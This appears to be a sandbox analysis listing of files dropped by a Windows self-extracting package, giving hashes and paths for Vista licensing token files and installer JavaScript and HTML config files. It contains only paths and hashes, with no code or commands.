MD5 548cbb6849115185bd8275f0e65203e6
SHA1 b5bf033959fe690e10839112049cd8527624ca30
SHA256 6ead232a0dd098caefbbbde6d517fe4b5c81e0b442338ae4ce80eda3d22d5acb
SHA512 2557f7a841df8ffd678d7d6a567509aec88e114e3f3144956f5bdb6bd04aa391f6470dce9ea5edef8b9f789d6b676e7fa33837029fefd68dd7ca7f564fd71241

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\ACLUIFileFolderTool-ppdlic.xrm-ms

MD5 2b07d90c6f9b04ccb82191029609099b
SHA1 4d676fa6197b7511d60dd03816c5d72589496d4c
SHA256 032562ca252cef56ce818ca806df8dbd77b7e0896b7536bf387acd5f616034ef
SHA512 ae3330135f03c268fb060c5add9bbb3ec48efd05e5100e0ee9cc3583a2c5d1b69cd9f914a6363d747a68d65952793e1d6420f16e411832b9464371ea660ecb76

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\ChangeDesktopBackground-ppdlic.xrm-ms

MD5 251b382de4f350addebe9202f5ac6624
SHA1 d3d4c736a2cabb8db0990e7ebaca2c6efef7f060
SHA256 dae9dcb82a1fc07ad6c9800143654634b6bf1e6240b40aa164d8e95c4a1f6b62
SHA512 6fe137e252b0e03fc06b9e93f072c1a4f53196488ea839467cdc87b7cbfe46dd82e15d897bc35c804d6d95c32bfd3fe511b352fc2d93d4af23a33bc5e9a6da46

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\ChangeDesktopBackground-ppdlic.xrm-ms

MD5 9639f160448ca086725f2e201eea829f
SHA1 464bbe14fd544ea209b204681387c6bb1c7b4ba6
SHA256 a7e98c1f8e956303918bf0dd060d92814f54f5d8750c2a9b4876c26bc584e798
SHA512 0d7d43622f7e9b5b0dfd2c1c381040aca503f513886e759bc7a07b4817e2c4b86aca2ab096aae4f8d8fb2c1833013e2ec984db8bc87c384246435bbd1e322b3c

C:\Users\Admin\AppData\Local\Temp\e62992d\Load.html

MD5 1757c2d0841f85052f85d8d3cd03a827
SHA1 801b085330505bad85e7a5af69e6d15d962a7c3a
SHA256 3cf5674efaaf74beccd16d1b9bcf3ffb35c174d6d93375bc532b46d9b4b4ed35
SHA512 4a12a55aac846f137c18849302e74d34df70ea5aaff78d57fce05b4776bedcde9e1b1032734e29650bcbac3e6932dfef75d97931443446a23e21cf5b3072dd9a

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\HomePremium\tokens\issuance\client-issuance-ul.xrm-ms

MD5 12e793fe60505bad1c3df58779d83dab
SHA1 d547957e832444b8f58653afad277601ab8dec4d
SHA256 73c4c8445a6b4813cea814199f6364ad5a5054797a10fec9c47d77b811fee640
SHA512 eaf6c27de9f71bcdd8412623e32ee08145932826cd802ba398765f283b38f3181bc6940cebd4343199d754dc4243b608c2bba223c31805341b282b396a972053

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\explorer-ppdlic.xrm-ms

MD5 d653e5080f8f1b158f11a372c4aee9a8
SHA1 21d98aa134df90f33d9dccf5c11646dd94461d7c
SHA256 4d460348ad0f8e43cb32bdf3dfc089233aff2b21e37a91729fbcba0b42b243d2
SHA512 03e7256a24852ed5c3576ee33f540b86c2eecc58d9b443f7520a17b5414e0917ba78fab4dec431bb8f5f0f5f74bfca460c17fc54822889ea429da74b77e7e574

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\feclient-ppdlic.xrm-ms

MD5 9e5648e9a5ed9839107d9261ad06868c
SHA1 2e9ad9cc89f5241686730aa20ed8f56d5529c01b
SHA256 52fe13314f51b444ec6f95f4accfc520851257123a0d010e7ff01a0f9bb5114a
SHA512 56948386d009941682287d847965de56d6a441f6bae2a72e30f857e18f432241128daf75dda92233747116d0f2f9b7dbc6464ef878a6cab309b3351b84b73b2b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\GroupPolicy-License-ppdlic.xrm-ms

MD5 8aa272b295a648066b2a4ed3ce735cc2
SHA1 5fad7788cffac50ecbdf06bb3cba1e0460528b02
SHA256 240942b86d2d82e5244c7a30cebeb53f9648fe8d3bf04d39c01340c715170aca
SHA512 415e8dfc46f3f7f06cbfc5775818ea95c865b3fcbec1615f36598b68e396fae1de32468632c4b192d7d7b442574381378f306d0a97b631e1ba55abd1569af398

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms

MD5 cfc8a17c78a832b037ef88df42e74129
SHA1 74b5d2857222e83dd8f2e55068388d3553cbc0f4
SHA256 3f52bec95945c4e015520df3f7d26d67067ac7ef207038d67d4486d2ebb676c5
SHA512 34ac48bc3a34841a2054f55b226061846797f9a93ad878f7db24ba4b9f074e17fdedac4365fcee5bcc0d10d23eccac14f1c263c6778ee68e0e8664e1e8420b2e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MediaCenter-ppdlic.xrm-ms

MD5 d356fcea82a3b7a937e4375619683434
SHA1 f4ae7b38eaf1ad2b78c5f48695ce6c95f88ceca0
SHA256 14d49431e6c7381f2f3c39c14f6fff88a1f7039113907ceea0fc283d326b3850
SHA512 5cb66b5b1b6b004bd676caa2fd740d671a64325c71dd755f1d444508892782a4f14944aff7afc9068396c37a091ed6877bb472a58f1687bb4ec772c467ef0617

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MCLicense-ppdlic.xrm-ms

MD5 7b56436619b89659e398e4a4e1601e29
SHA1 bb63a8630808e7d8dd31a839be1b02889bfb4e53
SHA256 d74444b75681c2a6bf3a96a65a2870c86032127dc0c7595e4817cb86387ccc1c
SHA512 de0459fc8aa339420810da590c1b598d9f9607c996fedc1f3daa0d195e2a45954f8132b052cb3893d2fe4288dd231abfbf16027913569c446e910801f236f0f5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MathRecognizerEventsLicensing-ppdlic.xrm-ms

MD5 b8c5ae3dc47030cec78d84098e519227
SHA1 e19d21e0226cc18575144080359f10f6167c413e
SHA256 9e4393351a92b6482eab7ddc0f538bbb9ee10b462860dc5b472d6877f83b9351
SHA512 eaceca2d41681f0ce6b9ce24507c38d0d1ef59c6fed8bb81f2274392114a564148e16e0dd9ff93932fb9c96ba1dd987d034cb03100317eef9268a468af3c1196

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\LSA-License-ppdlic.xrm-ms

MD5 9d7c5200b61f953120941ac7fcd7fcf5
SHA1 4049deefd1b74d426007b92142a4d0f0741744b1
SHA256 12d9d6d044720d681bb98ff805341c3db1144ea1dae7ca0c3455a898ba415ecb
SHA512 e2e8e79aa9f0e7c2d0f6f7dfa2f6839fd2390b24a3944353c3d693fb4cb20d777df6c6fa63d0177ce3fbd5495085ccbd513ded6ebb8f2e2af0e7d070dc6067ce

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\LSA-License-ppdlic.xrm-ms

MD5 2ce388c6499b1735aac867d6b040c630
SHA1 7dd1a01e7be48f5c7de5ca8a9e59a77a6d926b53
SHA256 75db0a68a92f262316a7d1e8614a4ebed178ec8135ead5086b73f02a197b2a3a
SHA512 36cd480abf828cbb832d18621dcee7adebc714f256a0d35baf4953fb542ebf170eacc7568fdf548380eeec7867972c4c1ef469c22289934d11b411c78ab0d0b9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\LSA-License-ppdlic.xrm-ms

MD5 693ce90f47a550bad0ef38fa5597ba97
SHA1 496d58bb638d8d13174415841cb9138492bed0f3
SHA256 f3f1bdf5524cacb5f5b62f7d4e484757ea485b2a8463d1d39fe19fb7492aa7f6
SHA512 bc7befc8c60100a4d1658f238a7486979f5a4df86e22fe9471f803414fd763cdd95f7cc57c442a1d78d6bba26842688b9c7469ad951cdda34970a212d6aeb491

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Kernel-ppdlic.xrm-ms

MD5 2f271db1298e877eeea0fef3d10142d7
SHA1 6961cbc5d6ba29365fea56180beecaab8796a141
SHA256 cdd917b6a4e89493b26c295a5d538973d526dffe7bfedbf2e22359d24250004b
SHA512 e0f79ac2f07859ca876113e82c15da85737fcb00bf89f5fef658f5e3522ecc22e0c0150f5b5b1589ce9c5883c562637b7968db6925e204dd830db1b16511ea12

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Kernel-ppdlic.xrm-ms

MD5 09979da0bfed5e0e1811886fbc9d9b67
SHA1 06f9d2da5fe50162af4cf098b275c22f91fee0a2
SHA256 f2de33d71fe50b113f6b84922fa6cc4358387c3005772b948e2d388d309608f8
SHA512 98f699131f34b50955b302e9c66d918e3870ca2a6306921313c4bda947d3be24681effc659a371007f1f350369ffb96ceb3a94b601a5fe7091c6ed99a69e88bd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Kernel-ppdlic.xrm-ms

MD5 010255f2a744182d2e7de3cf62a04386
SHA1 3d62aa84dbb22854c16032e775d564f76ebe18be
SHA256 ef23ea9ffad3404a4ca42561cb400ee9a6e59fe8fa076d0af87e93c50371a0c9
SHA512 4cd2a03581d94a875dfc8f4fd9248aba76f9dbdeaf8a528d9ea589862cb2305eddeb85cbaa5eeabf13366e07722018cae322975fd46a03cfd46928588a1a9326

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms

MD5 4280e9e5bc22508620a384c43817e75a
SHA1 b894b6ff5cd8eb750de50c66d33c8b02107f80b2
SHA256 6204106d9744b056950c05d8eee1367e1aad1ec6a8a5a597b26a29ecd121c6a6
SHA512 ded077eb0ddeae28cf273d126c87c80295144d175adef0263f4285cde1ef3dd0ac3383b6db7e24320a694bb396b558d1a80ef4be05b2f9ac3905e3c3e93cf50e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms

MD5 0821fc1abadb7004e66049a21c7b305c
SHA1 53e459663c2f8f13bbad30896fd34298c2df7742
SHA256 63f19f882cdd7871911562ec2f05d53c58ee391746de7bd9a97452615cd9ddf5
SHA512 d2f5bb62cf28887ab2bfd4426325e3ff86fefc68385ab1709f56e623a9946b82c50113360a2c26b988b59e967eefa8ba9c3d6bd639339b72a80094bab9b6d302

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\IASLicensing-ppdlic.xrm-ms

MD5 145bc852020a15cbf1c266f227d24175
SHA1 90f7d299e3eed3dc508f35e008896c08169137bd
SHA256 def11a1ab9180f235d2233afdfff1b95d3cd9d5861560cce81876e7b2f463012
SHA512 f7d16e109ea05977e8cc2e78d10c2a91da43b9c16b947bef5525e64e636514078f030f454deb6e2cf8fbda8851ba8d9e2628c3b85b0b06dbf852b462e594f56b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms

MD5 fa5086f58e8f932241c11aa95793e2c1
SHA1 13ded8cba00f73b61714ebc1522ee4ed76eb39c6
SHA256 39b1824c863f54359c7db73c3ab31f9f02cba1d7b468f21b017224dc8194ed1b
SHA512 89dac1fafecdf1359ebf549715deb8fa63131c5cb3a5a01cb64d6d601501f7bb57b881d4d93ba57028aac95f8a4d5b91927d79f7c250de173b87edf3820330e7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms

MD5 33b91d1d83c99f4f172a80792de08696
SHA1 ce501b6e91d96e0dea94be3900dd337ad48e0b24
SHA256 b2fd7d6361693b58f7cd5264dd9dd8ae46007d45b747842047959ac6ad513ed2
SHA512 e5dd0e8f8439973036510d91007fede419e2d6cec88de8c428de05e47bb23e8124b74a57f0648c8451ea73377316d0e2afb24beedfa4c961a78285dddf0ebb9a

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\feclient-ppdlic.xrm-ms

MD5 68c4a03617e4f26e0c0c9a4b24859e9c
SHA1 76304e5d962d327e8b1dc169ccee871a325911a2
SHA256 36247a9583ef91045c268cc43e6111d901043c977dc0357cbc0c1bce412085c7
SHA512 50928957f3a76ec73c596ac7098a0963fcdd383ebc952ac2d0dc3f7cb508f1cf7e376d74532091cadd57a735e6b3744e593ca0f21557a29371ea6bb8a3c1368f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\explorer-ppdlic.xrm-ms

MD5 f7dc315ba4e465d20ea75b88d5c3a5f8
SHA1 a305757ccff94389969611ac01b630874fe249d3
SHA256 b673596ef7cdb0a59672c956929aaf5f390cdf7f87144d052adaba77d8292086
SHA512 e399ab67aca421ae84e3106c3421929c7f9a11b6a700993fd89d3b3ac0aa9e24a3418761d29a346710de22a43aed83864ab0a90ceec5a199cddd1928e3648e6b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\feclient-ppdlic.xrm-ms

MD5 e59ca3198ea3b29db912dc4a992ea597
SHA1 473757fa56fc5bd35dd82677ee6a2ce947f00dd0
SHA256 298a0ff8e04375a903eaa53f5fbaf4c6bbb3713e4feb2a95a4bee45426a286b3
SHA512 4c45590af212ca806abf9da6169c8e41fbd2d1772167a22268be19e37e73c5bcd0db52265660ea13f6daa1feb4dcd138dbff35d5b9aff434cc4dadae3e651e20

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\explorer-ppdlic.xrm-ms

MD5 eeef7b6c4ce548e031d7fca8a06cc697
SHA1 e98fbd5f5182b398b58a8d89145c9cd61a50921a
SHA256 ecba5cf4114af056c705d284468d5b53369c9ef432fdfb1cd1ade8b16916e7f4
SHA512 67d449d394fbf2d31e1222a15a202c1a00ce5b52d5dc294310966b168fbe7170b14bf29add5a3236e06d3ec1a3d14df3bfa37fa41c69458d0a8934dbc8712550

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\DNS-Client-license-ppdlic.xrm-ms

MD5 7756bb922ada3f52d1f50e8988246cb4
SHA1 958a64d5c9fe9416d77293cab4e8b098e9e85b73
SHA256 c58d4cd6ae42863b111f46869949e0467d53ca0eff04c4a7084d8d4d257f10a5
SHA512 9a570e632af55231cbff69fee9dad600ccf406b0263d7945c134b040acd8cd1bc37f630dce80283ad24aacacee1341abbb79c7a1cfe25c45fe89c26dfc5a0a2d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\DNS-Client-license-ppdlic.xrm-ms

MD5 e5fc1f60c87f0764296f279426f2de4d
SHA1 7a7d9b45dab4a2bc57c523e8e13a70eab18a6a55
SHA256 d155536463afb3f2559fc2cec0a8603ec36461905b3898d2ad66111b84ac3650
SHA512 3429c00c3aa340c4eb64264e063b071963495da934ff784388a4a2da3aa222c24083eebfc813bd184ea244870440d99b5643b42657cefa3531803e115db14635

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\DirectExperience-ppdlic.xrm-ms

MD5 1228499706dbd67ef64e2655bcf1280d
SHA1 daabba98af2270775f02de2a76494a6c48ef8754
SHA256 83f7ef0bf97331aaccc884266dcdb6be2389fafa16afec0ff22c1cfe2ba52421
SHA512 8e1130569e80fe6eccd16b964a4d36224946f23b87f23f2303e9961828b886a0941c9d241acf5e941a22d5727a9f7ca637e843fc0a55d0dc72964e4d1279ffb1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\DirectExperience-ppdlic.xrm-ms

MD5 45e01af8a6dba520b69b9741eec236e1
SHA1 dd35aaa8379dde2562ea9c9a4a12edbe59c4fe53
SHA256 e3704442713955877e6bcd695e4cfd01f71d0d2276faf05c867e724c6ae7a0e0
SHA512 2b56fc0eb9fece40fc106fe9e0580f9e483639cb3178c8519fbdeb58cb6f3dca96b31f9ba5a63e0d4e7cae2cc80255739edc5fa9ce7a4da027b1900fbcabb844

C:\Users\Admin\AppData\Local\Temp\e62992d\common\js\common.js

MD5 87daf84c22986fa441a388490e2ed220
SHA1 4eede8fb28a52e124261d8f3b10e6a40e89e5543
SHA256 787f5c13eac01bd8bbce329cc32d2f03073512e606b158e3fff07de814ea7f23
SHA512 af72a1d3757bd7731fa7dc3f820c0619e42634169643d786da5cce0c9b0d4babd4f7f57b12371180204a42fec6140a2cff0c13b37d183c9d6bbaeb8f5ce25e5f

C:\Users\Admin\AppData\Local\Temp\e62992d\config\config.js

MD5 34f8eb4ea7d667d961dccfa7cfd8d194
SHA1 80ca002efed52a92daeed1477f40c437a6541a07
SHA256 30c3d0e8bb3620fe243a75a10f23d83436ff4b15acb65f4f016258314581b73d
SHA512 b773b49c0bbd904f9f87b0b488ed38c23fc64b0bdd51ab78375a444ea656d929b3976808e715a62962503b0d579d791f9a21c45a53038ed7ae8263bd63bc0d50

C:\Users\Admin\AppData\Local\Temp\e62992d\common\js\external.js

MD5 140918feded87fe0a5563a4080071258
SHA1 9a45488c130eba3a9279393d27d4a81080d9b96a
SHA256 25df7ab9509d4e8760f1fdc99684e0e72aac6e885cbdd3396febc405ea77e7f6
SHA512 56f5771db6f0f750ae60a1bb04e187a75fbee1210e1381831dcc2d9d0d4669ef4e58858945c1d5935e1f2d2f2e02fe4d2f08dd2ab27a14be10280b2dd4d8a7c6

C:\Users\Admin\AppData\Local\Temp\e62992d\config\installparams.js

MD5 5341de2e990c85795bcd6f09252f908b
SHA1 b88dd2301853dfcab8b54f45be648b17131e83c6
SHA256 8f93c4023af718e0f8e87d19a8b3e840a88dfb8e329fd8f5eaaa2a5b9bfa219e
SHA512 e0fb846c9bb836c4d3b5c444d9b45b2e489354d55688cb7da710c199a9f8f11491b74d1ff631c38eca633165923a3271c2136040b23a52a8dc6825fffada70ae

C:\Users\Admin\AppData\Local\Temp\e62992d\config\stubparams.js

MD5 91f6304d426d676ec9365c3e1ff249d5
SHA1 05a3456160862fbaf5b4a96aeb43c722e0a148da
SHA256 823f4f8dfe55d3ce894308122d6101fed1b8ef1eb8e93101945836655b2aed1b
SHA512 530f4fad6af5a0e600b037fcd094596652d2e3bf2f6d2ce465aae697ea90a361a0ffcc770c118102a0dd9bf12ab830ac6b459e57a268f435c88c049c127491f4

C:\Users\Admin\AppData\Local\Temp\e62992d\common\js\jquery-1.11.2.min.js

MD5 5790ead7ad3ba27397aedfa3d263b867
SHA1 8130544c215fe5d1ec081d83461bf4a711e74882
SHA256 2ecd295d295bec062cedebe177e54b9d6b19fc0a841dc5c178c654c9ccff09c0
SHA512 781acedc99de4ce8d53d9b43a158c645eab1b23dfdfd6b57b3c442b11acc4a344e0d5b0067d4b78bb173abbded75fb91c410f2b5a58f71d438aa6266d048d98a

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Enterprise\tokens\issuance\client-issuance-ul-phn.xrm-ms

MD5 332947e258e1114c7f2d852bce62eb80
SHA1 75f2371b2c20b5ade740dc1b0d9e9c622135673d
SHA256 736da0a46142d2a7dd9b2d23442c0eba995e50e8ecef55fdc1ea58443970130d
SHA512 0c4105e7ef4621929dbfa6191ba1b2019bd827b40bfef5fd3f98b1d773d7483c2348dccae8294ad13a85a844882695b0cb8f0a91c1d0fe75eb8ee94dc3393341

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\issuance\client-issuance-ul-oem.xrm-ms

MD5 e892e1b25539c170cc01bd74a15ab962
SHA1 3e654148ab1c134d9767e91fedb2f5e7e831a98a
SHA256 a155b80e8b6b2b7f835cd558c099efc8317b981fdd72341e5f2437ae57f2d6f5
SHA512 a26dbe7c512ce265ded7c65c83c29612093cfdb168c7a1792d9bdb4d1e294a73981fd27e8265ea9a63556e1769512d3e4c93c36759678293d9d5755353f8904a

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\CaptureWizard-ppdlic.xrm-ms

MD5 16c897eb67222266e7fde3e66b9f334d
SHA1 d2e7939f11c5f2cd3c3d4732538b36a4c9afe445
SHA256 cb2dbd84148e08af51b628031b1a61c1b32350ae606c86d539734b4161f83770
SHA512 c7c683246afecdf73d1020b46dcbe1841e3ff752d3e8764e75fdf178dd185ca299aa81729a8c48d61803fa93a3d0a80ca72d554166035bb3db6dd9c181cfc81d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\appid-ppdlic.xrm-ms

MD5 7097f418d4b83570c9b014fb626572a1
SHA1 5facafd5ac48ba31ce68c64e9d92d9977b427cf5
SHA256 48be90970533b49bb33ac8318ce124268ef92fd8bf828383cc0f359e8cfb5727
SHA512 01607ea00b4daf9c2ad38f300a1482b9d509f4fdf8cb7f24b620d3eb2cd09ab8585437eb0d50d18b313e9f6d795ec58859e7568249284744356963644d77db8f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\appid-ppdlic.xrm-ms

MD5 40443e2895c8d0af0802eb9fd8327d2d
SHA1 6305120b711e98f59bc2576f63aa038cc66278b6
SHA256 a492f612b7149e2e23ce1ee481c718ee5c11e6add36d5287b47ee8bef07255c3
SHA512 0b132b33a54c1ed29946a7c2c5c6b59078358a57cea6d51e65da0f56bbd868a957620f394d16668f5f83c9ba3254c1adfaffdb3f4985af450dc77adf3eb4312f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Cert2.1\ACRSYSACRPRDCT.XRM-MS

MD5 d2a59a8f4c2280d45165363e377ced91
SHA1 6cf0a51fc0403d4dc02e3bb4f605d5da69bd94f6
SHA256 7a9a5a6dc2f4944b534a3f67dabbf036fd44be79ab34c7e84f0a01bf3b0a779b
SHA512 71bb0db1ca839b4ef893654927934eecbb6e6001829e1dcf7825fa047b5e28b3dc6daf7247ec7990075f0669174e6087e328e2ab35b2b146ab0f87c458a25cc6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\ACLUIFileFolderTool-ppdlic.xrm-ms

MD5 0a17d8b4273b9356ca9bbaee26d34d49
SHA1 a10cd7dee5358c511858c2d1bebcd41f5fd8a75f
SHA256 62d3ce7520761fc4f637cfced0ed0f8578d32ca0fa7f2dfbd70ef3a03a3d298d
SHA512 ff6066f2ea0af14aee6829568ee32eeb62476cafcd3b2dbca4d2ad907dfd2acb14c00dcb4b12f2c098f60b5a3d4b09aed041d1898ac3e88407e53cd278a354df

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms

MD5 496c412bf6aa299d21e9a86898ca8569
SHA1 a38443d079cd05e93233750490383fe0df40dbd1
SHA256 cf5db87c483b03dcb1161673e60512873dd0c3c398641617f1d257b82a576c0a
SHA512 42e6e0e8720bf968834d142237c33c56a2bdab15ee4bb7014c42477adba82fed972e563a48af1e216431046fd9d30f88dd66bdb085131f6f02d956519f5d113b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms

MD5 89707824f9eb5d4c6bff43c24b8b67d4
SHA1 265ac3821adb755387235457b4edf6c18167d575
SHA256 58bc96e14a3c9aa192853ab26e3e9343b3660d82be997ae557c4b1f37b8b0832
SHA512 6116a25a605fd30c3a59576f4ecee2f5bb953d445a76ae80245154ced656b3d90818086c0499aa4e23caf2bdb8865d1ebaf60afe0a745a4962068731988421cd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms

MD5 dcabbaefad41b57639ab40f6549b092b
SHA1 56a16b2c5a4230fd064ab320ebe1595ad7fe1485
SHA256 7125bccd953808e3e41cb535e6fc41ac68e7131aff7812f2ffaab61fea5081b8
SHA512 24ce408a4486118de9ccc27c44e2828cf7a4339529a3c51e44f0bb08ac414a0c4c5a0c91a15315e444fc60194c7bfe25d34b93caf938f76f41ab478e31c04bb0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms

MD5 3a7d973e5a523ba81b0a99dcb412c4bb
SHA1 e405c2b9078ca0091c8f1a25ca18fa2507d7efe6
SHA256 d95f9fa4f9139e5c4857d45dab4e9f6a2792532da188cd5e9ef64e39100f9aa0
SHA512 8b0025f60e076a3ba3e0a316300a486dc5390eebe0c91584435026962abbd4c394aecd9b3b9d8351ef25f1cde82f6aea2049abf7dc869401420fcd09e0e7d747

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-SensorsLicense-ppdlic.xrm-ms

MD5 71469ac8a38b3e7563ddd50509ed09a4
SHA1 546e55851e1201bc91f35ea8546d89e203deabdb
SHA256 99be3013e4281a7f7a7337abd3c22b2c705756014fdcb086b527d2d27900fd35
SHA512 1ae994e5d4357df0d8f3dd41689b654b19e3a951d8c4d843ed16e7bbd5ad158ce053d93cac4bffbd63ccc606a79c258560e713b8b132e001e9b0cdd4058d6652

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms

MD5 5133666a540e8d6b70240d2e44b39d64
SHA1 950ca68dc88d3f60de4689eb665a94c83e81e602
SHA256 f2b2e2ebd77ce9ebbfa0a2395107d8cbb469aef657bab90487cd5fa0dfd93daa
SHA512 4b15a339b0d0e60fb8a0a66d92fa893787b587bbe4654d06c7120b8f0986aae3d2656fb14731e6e0e456d7f569b4600d04c88703969a4d5f51b0b6e7f5ea27ab

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms

MD5 21806ab759e66a52e8e6dd8ed1dc3272
SHA1 883af44a404c461d318040a36607cb50f63dbcc1
SHA256 f6a02b2a15d4473dfb7d69c362b2789418876c0322008ef857f039aada5a1c04
SHA512 b0a9d88756d4f11c743853e387a9ace9bd3ad772dcaa30c1f5b1bb41bc93bf6af08037bdc53b29bb2445844937ceb7936e3811edf52a2d568dc5ef8e91589864

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms

MD5 8710a5c32811b2d81364094902e987b4
SHA1 7dfb0986dfb65e1f641d1a7bf8b2295300eb7389
SHA256 f883eae6787349486110046c1cc7d5045ddab819d825eaba2fe59578daa8d962
SHA512 d325a312e019358501b529fd941c07d24eb8e0cfe7db3d2616f25c39c3b443a55742be32f51bffe9f822ce0347aaf3304210f9ad22ee29ba054cf1f45eaac966

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms

MD5 fd33b8b79bcf5ced20915a0dcfbc9002
SHA1 093f08777c07698a32cea894481525caae82be55
SHA256 36213635fc3db3d1a357a614d89f355df0f04668c49257b888c6052a93de7d06
SHA512 ac2f07adf90f2dc2e6e2f48c9ca4f94fbc3e6dc3ab596e65181609e97fcc776f0f9296e1c147cbb17ebd6724105a3fc74dde040f8115b2304955bf6b1e58e2ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 906d64fdae0f98bff23abd131e388452
SHA1 916a6c0f0257de0738e6016b08989500a3f4b26d
SHA256 8ea22ebe032f249f4cfbd26ee0bdd28c1ca9a7e3754e1810d6ce209b94f6ffa8
SHA512 29f047e37a9804bad4aa81f511f69325cb1dac88afce8725d669aec0860b461f9e183fc37e9e5405f46b10777cf33ea769deb85fda653fc79e144abf6ae3d76f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms

MD5 8ecc877351ceef3516e51ef7e3b10b8f
SHA1 a81637e8ad25797a59fb6ef9bb66751ecca6845b
SHA256 c7db0b64ad1d626514f13d56c2096258314ab861a806925a63854ca4d73d7f98
SHA512 dabdbb3a45f967b51efa531951f23657c126328a9f11b7918aefebe08dbb42cd571d28d457ebbffcd4a1e4f648c7c3ab747e70f3c05b26acc22cfa0c520c5841

